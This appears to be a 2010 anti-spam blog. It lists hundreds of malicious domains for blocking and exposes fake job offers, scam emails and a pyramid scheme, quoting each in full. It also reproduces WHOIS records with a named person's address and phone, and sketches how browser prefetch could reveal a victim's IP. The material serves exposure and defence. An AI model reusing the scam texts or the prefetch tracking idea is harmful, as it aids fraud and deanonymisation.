Mochos.net
Zorter.net
Movies-celeb.info
Onlymoviesporn.info
Porn-video-4u.info
Pornyardmovies.info
Videostreamporn.info
Moviesfreestar.info
Nanocloudcontroller.com
Iliked.org
Yougoodvideo.net
Shloesandrooneys.com
1200kb.net
Banfieldsbest.com
Btp-tags.com
Doit-4-u.com
In-ta.net
Media-share.org
Mwcdirect.com
Pixel-pie.com
Planetsoldat.com
Sainser.com
Wnizip.com
Dsfungssdfg.com
Sbgfdfsggf.com
Sportstickets.tv
Sufdngsg.com
Missing-codecs.com
Missing-codecs.net
Missing-codecs.org
Vidscentral.net
Consp.net
Thestability.com
Traffcity.com
Polytech-electronics.net
Blackmaven.in
Blueace.in
Whiteace.in
Whiteoso.in
Whitewizard.in
Globalcloudbackup.com

Friday, 8 October 2010

position-nl.com fake job offer

A retread of this fake job offer, this time using the domains position-nl.com to solicit replies (there's also a position-gb.com and probably many other variants). Despite the claims, this job is most likely laundering stolen money and could lead to a criminal record.

Date: 8 October 2010 13:58
Subject: for CV #32
   
Building & Investment Company is pleased to offer you an excellent-paid
part-time vacancy for the position of Administrative Assistant(Representative).
You would work from the comfort of your home office or in our office, it would depend on your choice.

Our company is a large corporation that is building involved in a variety of activities
that include construction, realty management, investment sector, rental services etc.
Right now we are working on more than 10 objects around the world, primarily in Europe, United Kingdom and North America.
This is the ideal role for a highly organized and proactive administrator, looking to develop their career
with an established and successful company.
For the right candidate, there will be the opportunity to progress to Administrative Assistant(Representative).

Candidates for the job should possess excellent organizational skills as well as the ability to efficiently multi-task.
Ideal candidates have a strong focus on day-to-day operational excellence,
and a personal style that builds trust, and inspires loyalty.
Your duties will also include taking and entering orders,communicating with clients and partners, work with payments and information and creating mail shots.

Other duties of the Administrative Assistant(Representative) include, but are not limited to:
Incorporating effective priorities for the virtual office function
Administer day-to-day financial responsibilities for clients
Reporting online daily
Preparing brief summary reports, and weekly financial reports

To be considered for this position, you must have solid administration experience.
A good telephone manner is also essential.

Salary part-time: 5.000 euro/month plus bonuses.
Location: Holland

If you are interested, please reply to: natasha@position-nl.com with your latest CV.

Best regards,

Natasha Csereklye
Employment Manager
The domain was registered just today, the registration details are probably fake:

Domain name:             POSITION-NL.COM
Name Server:             ns3.nic.ru
Name Server:             ns4.nic.ru
Name Server:             ns8.nic.ru
Creation Date:           2010.10.08

Status:                  DELEGATED

Registrant ID:           OQKDBB9-RU
Registrant Name:         Fabio A Murgia
Registrant Organization: Fabio A Murgia
Registrant Street1:      Via Giovanni, 183
Registrant City:         Cardano
Registrant Postal Code:  21010
Registrant Country:      IT

Administrative, Technical Contact
Contact ID:              OQKDBB9-RU
Contact Name:            Fabio A Murgia
Contact Organization:    Fabio A Murgia
Contact Street1:         Via Giovanni, 183
Contact City:            Cardano
Contact Postal Code:     21010
Contact Country:         IT
Contact Phone:           +39 0 331 732700
Contact E-mail:          fabrinoz@europe.com

Registrar:               Regional Network Information Center, JSC dba RU-CENTER

A Netherlands company, with Italian contact details on the domain.. which is registered in Russia? I think not.

Update:  the domains uk-kbs.com and usa-kbs.com are also being used for the same fake job offer. Avoid

Wednesday, 6 October 2010

F35 Fighters.. going cheap!

The F35 is an advanced US built fighter that the UK may or may not buy to put on aircraft carriers that it may or may not build. These things cost £70 million a pop and given the current budget constraints, it looks likely that some or all of the order will be cut.

Fear not.. there's a way of getting F35's cheaper than the list price.. simply Google 'em and you'll get an ad saying:
F 35 Fighters Cheap
Best Value for F 35 Fighters.
Find NexTag Sellers' Lowest Price!
www.NexTag.co.uk

Problem solved! Simply go to a shopping comparison site. Apart from the fact that NexTag don't have such things in their inventories (they do have a scale model though.. whoo!). Indeed, NexTag does run an awful lot of crappy ads for products that they don't have.. so why does Google tolerate them? And how much do you have to pay to advertise a £70m aircraft anyway?

Tuesday, 28 September 2010

MS10-070 - don't panic.. on second thoughts.. PANIC

Those of you who know Microsoft patch levels probably already treat "Important" patches with a shrug, because the really important ones are always "Critical". So when Microsoft does an out-of-band patch only rated as "Important" then there's something not right going on.

Well, MS10-070 is one such patch, and to be brutally brief it means that IIS servers are vulnerable to an information disclosure attack.. very bad news if you are running IIS.

The ISC have more here, but be sure to read the comments.. because this one is looking like a complete fragging disaster zone..

Monday, 27 September 2010

"United Nation Bonded Warehouse Wales" scam

An obvious scam, but one that's really quite stupid:

From: AHMED SALEH ABDUL KHALEQ SLAEH ALAFIFI <info@khaliq.com>
Reply-To: khaliqalifi@iol.pt
Subject: ASSALAMUALAIKUM
 
From AHMED SALEH ABDUL KHALIQALIFI,.
United Nation Bonded Warehouse wales Branch.Office..........

What? Where? Actually, the UN does run warehouses, primarily for aid efforts (there's a list of jobs here) usually in areas suffering from disasters or war.. I don't think a Friday night in Swansea counts. But a bonded warehouse is not the same thing at all..

SALAM,

Dried sausage to you, too.

This is AHMED SALEH ABDUL KHALIQALIFI ,  Presently stationed with the possition of  assistant Manager as a trusted store-keeper herein United Nation Bonded WareHouse Wales Branch ..Office, Division in South West of  Great Brintain  . I will like to share some very vital information that would bring some good financial returns to us in just a few weeks or days depending on how fast we pursue the matter.I am seeking your assistance to evacuate unclaimed valuable property to your safe custody, as long as I can be assured that it will be safe in your care until i complete my service here
Why do I think that "trusted" is not the right word when you are basically offering me something that you have stolen? And Wales is in the "South West of  Great Brintain"? That's somebody who has a very badly spelled atlas that they don't really understand. Oh yes, and if you're in Wales, why is the sending IP address 110.159.18.181 in Malaysia?

This may not be the best medium to make this kind of contact because of the numerous scam offers transmitted through the Internet, but it is all I have access to for now.

Well, I'm glad you pointed that out because I totally believe that it's not a scam now. Tell you what, Wales is a couple of hours drive.. why don't I pop over with a van or something?

I will be very grateful if you can give me the opportunity to discuss this matter with you by assuring me that you will not use any part of it against me in anyway, I hope you understand my limitations here. I will await a mail from you.
What. like publishing your pathetic scamming effort onto teh interwebs?

Sincere Regards,

AHMED SALEH ABDUL KHALIQALIFI.
I think you need to double check the meaning of "sincere.."

Friday, 24 September 2010

position-gb.com / position-west.com fake job offer

Part of a long series of fake job offers, this one uses the domains position-gb.com and position-west.com to solicit replies. In this case "bank account operations" is money laundering, "transportation and logistics" is most likely a parcel reshipping scam and "private enterprise service" could be one of a number of criminal activities. Avoid.

Date: 24 September 2010 12:56
Subject: Re: CV 62

Greetings

I am a manager of the HR department of a large multinational company.

Our enterprise is connected with a great number of various activities, like:
-property
- bank account operations
- transportation and logistics
- private enterprise service
- etc.

We need employees in Europe:
- salary 2.500 euro + bonus
- 1 - 2 working hours per day

- free timetable


If our offer is interesting for you email us the required information: Chandra@position-gb.com
Name:
Surname:
City:
E-mail:
Telephone Number:



Note! We are searching Europeans only!

Wednesday, 22 September 2010

Evil network: VLine Ltd / VLINERU2-NET AS39150 (109.196.128.0/20)

A malware run in progress today using the arestyute.com domain made me look at VLine Ltd, a Moscow based host well-known for supporting criminal activities. The question is.. does VLine actually host any legitimate sites? The answer.. probably not.

An analysis of the netblock 109.196.128.0/20 (109.196.128.0 - 109.196.143.255) which forms AS39150 shows a collection of fake pharma sites, malware sites, fake banks and shipping companies, illegal downloads, fake passports and various other organised criminal activities.

A scan of the netblock using the MyWOT API shows a lot of very bad sites with a few rated "40" which shows that the MyWOT system has rated them automatically. You can see the ratings for all sites in the range in this CSV.

Google's Safe Browsing diagnostic for AS39150 is damning:

Safe Browsing
Diagnostic page for AS39150 (VLTELECOM)


What happened when Google visited sites hosted on this network?

    Of the 567 site(s) we tested on this network over the past 90 days, 33 site(s), including, for example, cgm.ru/, gigalife.info/, kastrade.ru/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2010-09-21, and the last time suspicious content was found was on 2010-09-21.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 109 site(s) on this network, including, for example, 109.196.134.0/, webserviceftp.ru/, webservicelupa.ru/, that appeared to function as intermediaries for the infection of 3232 other site(s) including, for example, madonnaonline.com.br/, veloplus.ch/, skihutonline.nl/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 165 site(s), including, for example, 109.196.134.0/, webserviceftp.ru/, webserivcessh.ru/, that infected 7766 other site(s), including, for example, madonnaonline.com.br/, homeandi.com/, ishrae.in/.

There's no reason not to block the entire range permanently, or if you want the individual domains check the CSV or copy and paste from below.

Zoma.ru
All4roof.ru
Minirank.ru
Chem-prom.ru
Dias-design.ru
Tile-world.ru
Airways-pro.ru
Mountain-air.ru
Office-ready.ru
Copyterra.ru
Home-building.ru
Vcam-security.ru
Find-furniture.ru
Air-free.ru
Office-interior.ru
Altioma.ru
Artellab.ru
Teplicy-volya.ru
Smirl.ru
Furniture-catalog.ru
Minipr.ru
Plastistrong.ru
Amalgamator.ru
Best-ceramics.ru
Vorota-avto.ru
Building-window.ru
Ccwater.ru
Smbuilding.ru
Home-interior.ru
Fertilize.ru
Light-breeze.ru
Sol-system.ru
Funny-holidays.ru
Furnbox.ru
Eco-bus.ru
Parquet4all.ru
Diesel-electric.ru
Sliding-gates.ru
Kamin-pro.ru
Gloomyandspy.com
Sultanpalase.com
Tdom1.ru
Aruspemedic.com
Atacmedic.com
Ballemed.com
Barblmedic.com
Bumedicine.com
Clayemed.com
Cupharmacy.info
Demornmedic.com
Dilimedic.com
Displimedic.com
Dns4life.com
Doctoraxon.com
Doctorpi.info
Doctorte.info
Draymedic.com
Drugstoremp.com
Gardmedic.com
Gatmedic.com
Ghostemed.com
Haemed.com
Hymedicine.com
Inlmedic.com
Inspidoctor.com
Izedrugs.com
Jestumed.com
Jolynbmedic.com
Kalsmed.com
Kedrugs.com
Lamilmed.com
Locumimed.com
Logdrugs.com
Lomedicine.com
Lumedicine.com
Mablmedic.com
Medalea.com
Medalee.com
Medalinve.com
Medaltype.com
Medalyssa.com
Mediardbi.com
Mediatear.com
Mediccu.com
Mediceday.com
Medicerly.com
Medicgant.com
Medicht.com
Medicineax.com
Medicinece.com
Medicineck.com
Medicineie.com
Medicineir.com
Medicinele.com
Medicinta.com
Mediclace.com
Mediclder.com
Medicmile.com
Medicnl.com
Medicorer.com
Medicsh.com
Medictu.com
Mediculio.com
Medicwe.com
Mediuling.com
Mediuro.com
Medulerac.com
Mestinmed.com
Nepharmacy.com
Nidrugs.com
Obamedic.com
Pharmacybp.com
Pharmacydg.com
Pharmacyec.com
Pharmacyha.com
Pharmacyji.com
Pharmacyna.com
Pharmacyou.com
Pharmacyri.com
Pharmacyta.com
Pharmacyty.com
Romannmed.com
Shormed.com
Site1dns.com
Staimed.com
Tommedic.com
Toucmedic.com
Towmedic.com
Unfmedic.com
Weemedic.com
Dnsupport4site.com
Frmedic.com
Golmedic.com
Grmedic.com
Agemedic.com
Balatmedic.com
Boulatomedic.com
Boumedic.com
Busbmmedic.com
Citelmedic.com
Clipmedic.com
Cofmedic.com
Cotmedic.com
Critrmed.com
Curragmed.com
Czkarmed.com
Drugsbr.com
Drugsdo.com
Drugsin.com
Drugski.com
Newnshome.com
Pharmacybw.com
Agammed.com
Alfmedic.com
Anodormed.com
Bapharmacy.com
Bromedic.com
Cartonlinesite.com
Caumedic.com
Doctorrnes.com
Doctorrteeny.com
Drugsab.com
Fiendemed.com
Sandpimed.com
Bilmedic.com
Socmdoctor.com
Anadoctor.com
Aprdoctor.com
Beldoctor.com
Cormedic.net
Cosadoctor.com
Cytdoctor.com
Decadoctor.com
Diadoctor.com
Doctorcitr.com
Doctordefu.com
Doctordnes.com
Doctorelig.com
Doctoresia.com
Doctorglos.com
Doctorlg.com
Doctorni.com
Doctoround.com
Doctorrman.com
Doctorsele.com
Doctorsour.com
Doctorsterca.com
Doctorstri.com
Doctorsust.com
Doctortelamy.com
Doctorusab.com
Doctorwnee.com
Dymedic.net
Esdoctor.com
Eurdoctor.com
Evemedic.net
Exdoctor.com
Faxedoctor.com
Flidoctor.com
Hodoctor.com
Idodoctor.com
Inamedic.net
Karldoctor.com
Lasdoctor.com
Lordoctor.com
Matmedic.net
Momedic.net
Pomedic.net
Prmedic.net
Prydoctor.com
Rodoctor.com
Sarmedic.net
Shimedic.net
Shmedic.net
Sigdoctor.com
Sumedic.net
Toudoctor.com
Tumedic.net
Wrmedic.net
Yeadoctor.com
Agefeskousavd.com
Baguntalput.com
Bandlobhepe.com
Doctoramro.com
Doctoraubr.com
Evercavsuv.com
Everuvdredsovg.com
Feremokerfeve.com
Kalkfallpoxeble.com
Kougsapelex.com
Kownamemavy.com
Laghtbukstap.com
Lekboxover.com
Lupharmacy.com
Mevbeforeday.com
Okworldadd.com
Perapsalfkvow.com
Pestendblask.com
Sallfapestpong.com
Seemalwayxame.com
Sekevak.com
Somekurvcar.com
Svowkooleskev.com
Swedoctor.com
Thousandbondepoff.com
Voecesoutree.com
Vowelvortevg.com
Wakerkesedurevg.com
Welebodyuvdred.com
Weskarereal.com
Wycerkaevsek.com
Yesqueskeovabove.com
Afmedicine.com
Ammedicine.com
Chmedicine.com
Medicalmoisdw.com
Medicalmoisdw1.com
Medicalmoisdw10.com
Medicalmoisdw2.com
Medicalmoisdw3.com
Medicalmoisdw4.com
Medicalmoisdw5.com
Medicalmoisdw6.com
Medicalmoisdw7.com
Medicalmoisdw8.com
Medicalmoisdw9.com
Medicineds.com
Medicinels.com
Medicinemi.com
Medicinena.com
Medicinend.com
Medicineoi.com
Am-way.ru
Sheathing.ru
Zakonoma.ru
Inmoble.ru
Crosswall.ru
Auto-wash.ru
Service-stroy.ru
Pure-air.ru
Window-tech.ru
Aeroventa.ru
Jackcond.ru
Ullte.com
Mp3fiesta.com
Setyupdates.com
Netspart.net
Myupdates.biz
Headboong.com
Myupdateswindows.biz
Bestandxast.com
Besternax.com
Erterzan.com
Joprestons.net
Ralaxanteras.com
Russian-post.net
Slikanddik.com
Trafallbest.com
Xalentarna.net
Zalevaka.com
Zaskupalt.com
Fdsdorgan.com
Freefdsvoip.com
Jastli.com
Qlepa.in
Infinitelivin.tw
Vviv.ru
Audo20s.in
Music9star.com
Nostalgictitation1.info
Pixelateder.info
Reducedilonion.info
Music9star.org
Video4gamle.org
Budulay.net
Ak2o.info
Bioloom.info
Cd3o.info
Dkm5.info
Drone2556yb5.info
Ek5k.info
Gambolsfhsw5.info
Jingoisticth65.info
Joculartuu7.info
L1nn.info
Largessff.info
Tjkd.info
Vaqp.info
Ymso.info
Globalstream.info
Xwealthglobal.com
Xwestprivate.com
Partnerandassist.com
Representativesuk.com
Tinygimme.info
Alm-career.com
Gdm247.com
Kadewsq.com
Kahlier.com
Myservster.com
Old-crash.com
Onlinesexytube.com
Vipnakurka.com
Asderbit.com
Ilaydiy.com
Ilovelasvegas.ru
X5vsm5.ru
Godfast.info
Haycorn.info
Lercuw.info
Winkum.info
Ukada.ru
Careerbuildjobs.com
Astraphs.com
Jarntauiuva91.com
Banktrustservice.com
Staffsecurecheck.com
Vseravnopidersii.net
Aatrgroup.com
Accentincolor.com
Prodesgroup.com
Kse-advertising.com
Sysport-1.com
Vlnet.ru
Intlos.org
Atomicc.com
Cern-a.com
Xbasex.com
Upslabels.cc
Securixp.com
Securixp.net
Addthiss.cn
Addthiss.net
Addthiss.org
Countinfo.com
Free-ns.org
Searchits.org
Searchnew.net
Top-analitics.com
Qweda.cn
Ameriprise-careers.eu
Piccinirealestate.eu
Sniping.biz
Your-usa-address.com
Gitrest.net
Utromesa.net
Yarostt.net
Absolutefinancegroup.com
C339.net
Freehost21.tw
Keller-services.com
Llwql.com
Parcelforwardingservice.com
Ticketalfa.com
Ticketbravo.us
Babaevo.com
Bestinsurancequotesinfo.com
Detoxhot.com
Freestarcraft2guide.info
Googlesecrets.biz
Guitar-beginners-guide.com
Insuranceproquotes.com
Pokeralpha.net
Agency-sunsea.com
Aslrr.com
Avelectronics.org
Buyfakepassport.cc
Buyfakepassports.com
Cargoex.info
Fakepassportsale.cc
Mbe-kerriere.com
Myhotlot.com
Oem-buy-soft.com
Oem-soft-buy.com
Raggaperfibra.net
Silverstarf.net
Whoismansheck.com
Yahoo-statistic.com
Geo-tour.org
Zeoxmark.com
Zeoxmark.net
Time-sync.net
Acfinc.eu
Banking-security.org
Lnterhome.biz
New-crash.com
Storetablets.net
Vipnakurka.net
Wallst-news-line.com
Sexyshowmovies.info
Sexyshowvideo.info
Allow-strike.ru
Allowstrike.ru
Antituta.ru
Awm-magazine.ru
Enterteiment-wizrd.ru
Enterteimentwizrd.ru
Julyrelax.ru
Magazineawm.ru
Magazineshare.ru
Nanovoice.ru
Protray.ru
Relax-july.ru
Relaxjuly.ru
Ros-tec.ru
Sensationworld.ru
Shareawm.ru
Sharks-devision.ru
Sharkstux.ru
Traypro.ru
Tuta-anti.ru
Tutaanti.ru
Tutavir.ru
Vir-tuta.ru
Viranti.ru
Virtuta.ru
Visitthermal.ru
Voice-nano.ru
Voicecontrol.ru
Wizrd-enterteiment.ru
Wizrdenterteiment.ru
Combicorm.com
Dertentazner.com
Notersils.com
Rerasterk.com
Westtrafficanser.com
Wrtumenter.com
Arestyute.com
Rtttins.com
Trrrasret.com
Ukklomk.com
Bibblea.com
Trawqe.com
Uttere.com
Yterast.com
Capitalmarktservice.com
Dangerousteens.com
Mrxbase.com
Sweetpornobabes.com
Sweettiny.com
The-snake-jewellery.com
Tight-slits.com
Tinysweet.com
Youngsweat.com
Zedexpost.com
Gkkotre.com
Letyasheypohodkoymoraleswtf.info
Mindwor.com
Promojoyswif.net
Tristan-express.com
Vain-and-ryan.com
Vain-ryan.com
Weslisnaps.info
Samsclearancerainbow.com
Samsclearancewebers670.com
Samsclubclearance.cc
7crack.com
7newmails.com.ua
9ladiesmails.com.ua
Abruzzonelblues.com
Alina-sp.com.ua
Alinamails-jl.com.ua
Allmails-1u.com.ua
Anastasia-mails7.com.ua
Annamail-jl.com.ua
Ckinter.ru
Contacts4u-sp.com.ua
Crack-info.com
Crack-key.com
Crack-keygen-serial.com
Crack-news.com
Crack-software.com
Crack-warez.com
Crackblogs.com
Cracknews.info
Dates-eva.com.ua
Download-url.com
Drcrack.com
Evadates.com.ua
Evamass-pa.com.ua
Evanews-pa.com.ua
Evanotes.com.ua
Evatease.com.ua
Free-key.net
Freecrack.net
Girlfriend-re.com
Julia-mails.com.ua
Julia-mails7.com.ua
Julia-sp.com.ua
Katerina-sp.com.ua
Ladies-re.com
Mails4u-pa.com.ua
Maria-mails7.com.ua
Marina-sp.com.ua
Matches-re.com
Messages4u-sp.com.ua
Mila-sp.com.ua
Nadya-sp.com.ua
Notes4u-pa.com.ua
Olganotes.com.ua
Search-crack.com
Serials-keys.com
Teaseville-sp.com.ua
Thecrack.name
Warez-crack.com
Wincrack.info
Yeva4u-pa.com.ua
Search-841.com

Tuesday, 21 September 2010

FirearmsForYou.com and the Chinese connection

Automated link exchange requests are annoying, but usually easily dealt with by binning them. This idiot decided to send me the same spam 25 times..

From: James <linkmanager@firearmsforyou.com>
Subject: Link Exchange Proposal from FirearmsForYou.com

Hello Webmaster,

I am seeking out possible link partners to offer as a resource to our site's visitors. I've found your website http://www.dynamoo.com and its information and advice to be a great service and I am interested in exchanging links with you.

Please consider adding our link to your site on the following page:
http://www.dynamoo.com/orange/links.htm

Our linking details:

Anchor text: Guns Online

URL: http://www.firearmsforyou.com/

Description: Buy guns online from a trusted source. Firearms For You has the largest selection of firearms and accessories.

[snip]

Guns Online Buy guns online from a trusted source. Firearms For You has the largest selection of firearms and accessories.

Your link will be added in the best category here http://www.firearmsforyou.com/resources/index.html

Please send me your site details and I will add your link as soon as possible.

I hope for an early and positive response from you.

Best Regards,
James
FirearmsForYou.com
9831 E. Bell Road Suite 110
Scottsdale, AZ 85260

Note: If you would like not to receive any further communications from me, please paste this link into your browser: http://www.firearmsforyou.com/resources/unsubscribe.html?id=[snip]

Or simply respond to this email with Remove as the subject.

OK, he's an idiot who sells assault rivals, but Scottsdale is over 5000 miles away, so I feel quite safe calling "James" (if that is his name) an idiot.

Now, if Americans want to take pot shots at each other with military grade weapons then it is up to them, pro-gun people will argue that it's their constitutional right to bear arms as American citizens.

But dig a little deeper, and these emails originate from 202.181.174.45 in Hong Kong.. which is part of China.. who are Communists, remember? It all looks a bit un-American to me..

Monday, 20 September 2010

The incredibly dangerous world of browser prefetch

Perhaps I've been living under a rock, but this apparently has been a suicidally stupid feature built into Firefox for some time, but it seems to be seldom used.

It started with a short spam apparently advertising a fairly well known black hat forum for hackers and illicit trades. It's not the sort of place that would choose to advertise itself though (it is strictly by invitation only), so quite possibly this is a Joe Job by one set of black hatters against another.

Now I guess that many recipients will have done the same thing, and typed the name of the site into Google to find out about it.. under the assumption that they'll find something that doesn't involve visiting the spamvertised site itself. But if you're using Firefox (and this possibly applies to IE8 and IE9 too, then the following message pops up:


Secure Connection Failed

-----------.com:443 uses an invalid security certificate.

The certificate is not trusted because it is self signed.

(Error code: sec_error_untrusted_issuer)

It could be a problem with the server's configuration or it could be someone trying to impersonate the server.

If you have connected to this server successfully in the past the error may be temporary and you can try again later.
Right at this point I kicked myself because I thought I had accidentally clicked through. But no... the certificate error was showing on the Google search page and I hadn't clicked through at all.. so why was Google trying to load the page and showing the HTTPS error because of the invalid certificate?

The answer lies in prefetch - a combination of a tag on the site, Google and the default browser configuration meant that the browser tried to automatically load content from the bad site just by Googling for something.

Link prefetching (and how to turn it off) is explained in this FAQ or this HOWTO guide.. if you are using a Mozilla based browser then go and turn if off NOW by going into about:config and setting network.prefetch-next to false.

So why is it so dangerous? Have there been any cases of malware using link prefetching to spread? Not as I know.. although it might be theoretically possible. The danger is that you have just revealed your IP address without knowing it..

Let's look at a particular scenario where this can be used. Let's say the attacker is targetting a victim who is using an unidentifiable email address, and the attacker wants to find that victim's IP to tie them down to a location or organisation. In this scenario, the victim is not stupid.. they don't click on links in spam, they don't reply to untrusted messages, never send read receipts and they don't load external images in their mail client.. but the attacker uses social engineering to send an email with details that the victim might Google (for example a telephone number). The victim may then search for references on Google and even without clicking on anything, the prefetch may reveal their IP address.

Alternatively, prefetch could be used to download illegal content onto a target machine without the victim knowing about it, or there are probably several other ways in which it can be abused.

So it's hard to tell if the original spam was a Joe Job, or someone using prefetch to collect IP addresses for evil purposes. But I'll bloody well keep the prefetch switched off in future..

Sunday, 19 September 2010

"hello / how are you?" mystery spam

I'm probably not alone in receiving a shedload of spam with the subject "hello" and the only content of "how are you?" A quick look at my spam filters shows hundreds of these with a small number getting through, presumably because filters are having a hard time blocking on this little data.

It's hard to be sure exactly what it is, but it reminds me the the mystery "podmena traffica test" spam from last year that appeared to be a widescale enumeration of mail systems that allowed spoofing, and those that blocked it. So, this could well be something similar.. an enumeration attempt to see which mailboxes DON'T reject a tiny, simple message like this, and then to use that data in the future to target those mailboxes.

"OK", you may be asking.. "why would you do that if you have the almost unlimited computing power of a botnet at your hands? Why would you need to be selective in your spamming when it does cost you anything?"

One good reason to attack only valid mailboxes with spam and not go for a scattergun "directory harvesting" attack is that mail spam filters specifically look for directory harvesting attacks and then block them and use the data to identify the characteristics of the spam attack. By acting more stealthily, it might be possible to avoid detection for longer and get a higher deliverability rate for spam.

Well, that's a theory anyway.. the best that I can come up with. Any ideas?

Added: here's another idea - the spammer could be looking for vulnerable mail servers to exploit later, this is  a data collection phase to be followed by something evil. Or it could just be a weird prank, of couse.

Friday, 17 September 2010

Networking4Africa.com - scam, spam or Joe Job?

Update: networking4africa.com's response is at the bottom of this post

One of the more interesting things that popped into my spam filter today was this.. at first glance it appears to be some sort of MLM scam spam:
From: steve@networking4.africa.com
Reply-To: steve@networking4.africa.com
Date: 17 September 2010 10:41
Subject: WOW 6 grand a month from your home

STOP!!! what your doing...do you know 3 people that have  $15.00?

And do those people know 3 people that have $15.00?

and what about those people and the ones after that? Join Me With 3 subscribers

and when each subscriber does the same through 10 levels

your income would be $63,982.50 per month

http://www.networking4africa.com

Join Now Pay Nothing Until  September 1st.

just get in now before we open to the public.

What if you just did 10% of that.
could you use and extra $6300.00 a month?****
all that for $15.00....
WoW that's the power of People Knowing People, Knowing People Knowing People....

www.networking4africa.com

Steven McGregor Owner and Ceo of www.Networking4africa.com and www.networking4afica.net
[personal address redacted]
+27.[personal number redacted]

Chat with me on face book http://www.facebook.com/smcgregor3

www.networking4africa.com

Please Note You will get Very rich with This program
So wtf is this? It looks like it is promoting a site called networking4africa.com (and networking4africa.net) which does exist (but more of that in a moment). But there are a couple of anomalies (highlighted) where the domain is quoted wrongly.. kind of odd for a promotional message. Oh, and September 1st is long gone..

Another odd thing is the inclusion of a telephone number and full postal, because be in no doubt that this email is spam. Typically we see this sort of thing when a Joe Job is in progress.. in other words, the spam is being sent maliciously by a third party and the telephone number is included to cause harassment for the victim.

The email originates from 216.59.18.30 which is a dedicated server some outfit called WebExxpurts who are assigned 216.59.18.0/24. A look around the netblock shows something interesting though, a site called iunmetered.com a few IPs away at 216.59.18.10 which is an anonymous VPN service. Given that the originating IP for the spam is a dedicated server (which appears to have no active web sites)  then there's a fair possibility that someone is using iunmetered.com to mask their IP address. But why mask your IP address if you are including a telephone number? It seems bizarre, and again perhaps evidence that "Steven McGregor" did not send the email.

Networking4Africa.com itself is hosted on 12.201.193.120 (a completely different network from the email sender), and the WHOIS details do largely match the ones in the spam, but that proves nothing. But now the plot thickens..

12.201.193.120 is in an IP address range which is allocated to "TEK CHANNEL CONSULTING LLC DBA WHOLSALE BANDWITH" (sic). Tek Channel / Wholesale Bandwidth are a very well known spam-friendly firm that has a ROKSO file at Spamhaus. This range has then been reassigned again to Global Virtual Opportunities Inc of Schert, Texas. This range forms part of AS46549 which has been fingered by Google as being pretty evil:

What happened when Google visited sites hosted on this network?

    Of the 2755 site(s) we tested on this network over the past 90 days, 371 site(s), including, for example, dontforward.com/, helpfulbackpaintips.com/, ultimatesneakers.com/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2010-09-17, and the last time suspicious content was found was on 2010-09-16.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 16 site(s) on this network, including, for example, latenightwarriors.com/, tricitieslifeinsurance.com/, networkonlinereviews.com/, that appeared to function as intermediaries for the infection of 67 other site(s) including, for example, ccll-gtyarmouth.co.uk/, rogersvillelifeinsurance.com/, mediascout.kr/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 16 site(s), including, for example, aardvarkville.com/, extraganancias.com/, latenightwarriors.com/, that infected 253 other site(s), including, for example, meb.gov.tr/, anakku.com/, tottochan.jp/.


In other words, this doesn't  look like the sort of place a legitimate web site would want to be hosted.
But then what about networking4africa.com itself? Does it tally with the ridiculous "get rich quick" scheme outlined in the email?

It turns out that the site offers an MLM program which gives part of its proceeds to charity. Now, I've never come across any MLM program that is not some sort of scam.. either an out-and-out Ponzi or something that simply fails to deliver what it seems to be promising.

The basic deal is that you join up for $15 of which $5 goes into a fund called the "Helping Portion" which is meant to eventually help children in Africa. What you get for this is unclear, but on the "Products" page are a couple of eBooks (you know the sort of thing).The idea is that if you sign up enough people then you can make a shedload of cash, and some of this will go to the "helping portion".

It gives an example that if 88,572 joined, then it woudl generate $442,860.00 a month for these good causes. But then if 88,572 people simply ponied up $5 a month to Oxfam or a similar charity then it would also generate $442,860.00 a month without participating in some crappy MLM scheme.

And yes.. it is a crappy MLM scheme that is little other than a pyramid scam, according to its own description:

Commissions are paid through a simple unlimited width, 10 level matrix.

This means that you can introduce as many Subscribers as you want and they will appear on your level 1. The subscribers that they refer will be on your level 2 and so on.

You will receive commissions at the following rates for each level:
Level 1 - $2.00
Level 2 - $0.75
Level 3 - $0.75
Level 4 - $0.50
Level 5 - $0.50
Level 6 - $0.50
Level 7 - $0.50
Level 8 - $0.50
Level 9 - $0.75
Level 10 - $0.75

As an example, if you were to only introduce 3 Subscribers and each Subscriber did the same through 10 levels, your income would be $63,982.50 per month. Results will vary from person to person but with a deep matrix your income can be very stable and with unlimited width your potential income is unlimited. 
That's 1 - 3 - 9 - 27 - 81 - 243 - 729 - 2187 - 6561 - 19683 - 59049. Having difficulties visualising that? Well, it looks like this:

..wait, isn't that one of these..?

..yup, it looks like a Pyramid to me.

Now, I don't know South African law and I have absolutely no idea to the legality of this scheme.. but legal or not, it is certainly bullshit and dangling the carrot of starving African children is nothing short of dispicable.

Which brings us full circle to the spam email.. it does bear all the hallmarks of a Joe Job, but the target site is a stain on the Internet anyway..

Update: Steven McGregor emailed me to say:

I apologise for the spam e-mail that you received. We have been under attack by a spammer based in the Philippines who has been trying to shut us down, but I believe that we have put a stop to it now.
Just a couple of points:

    * The email address that you show in the article does not exist and never has.
    * If you look at the full header of the e-mail you will notice that it did not originate from our domain or IP.
    * We have authentication protection so it you contact our provider they will verify the above.
    * If it was a marketing e-mail their would have been a referral link.
    * If I was going to spam I would not include my personal contact details.



[...] We have had everything that we are doing confirmed by an actuary and I don't really care to go into details. The site and our actions cover this sufficiently.[...] Network Marketing is a completely legal business model and not a pyramid scheme.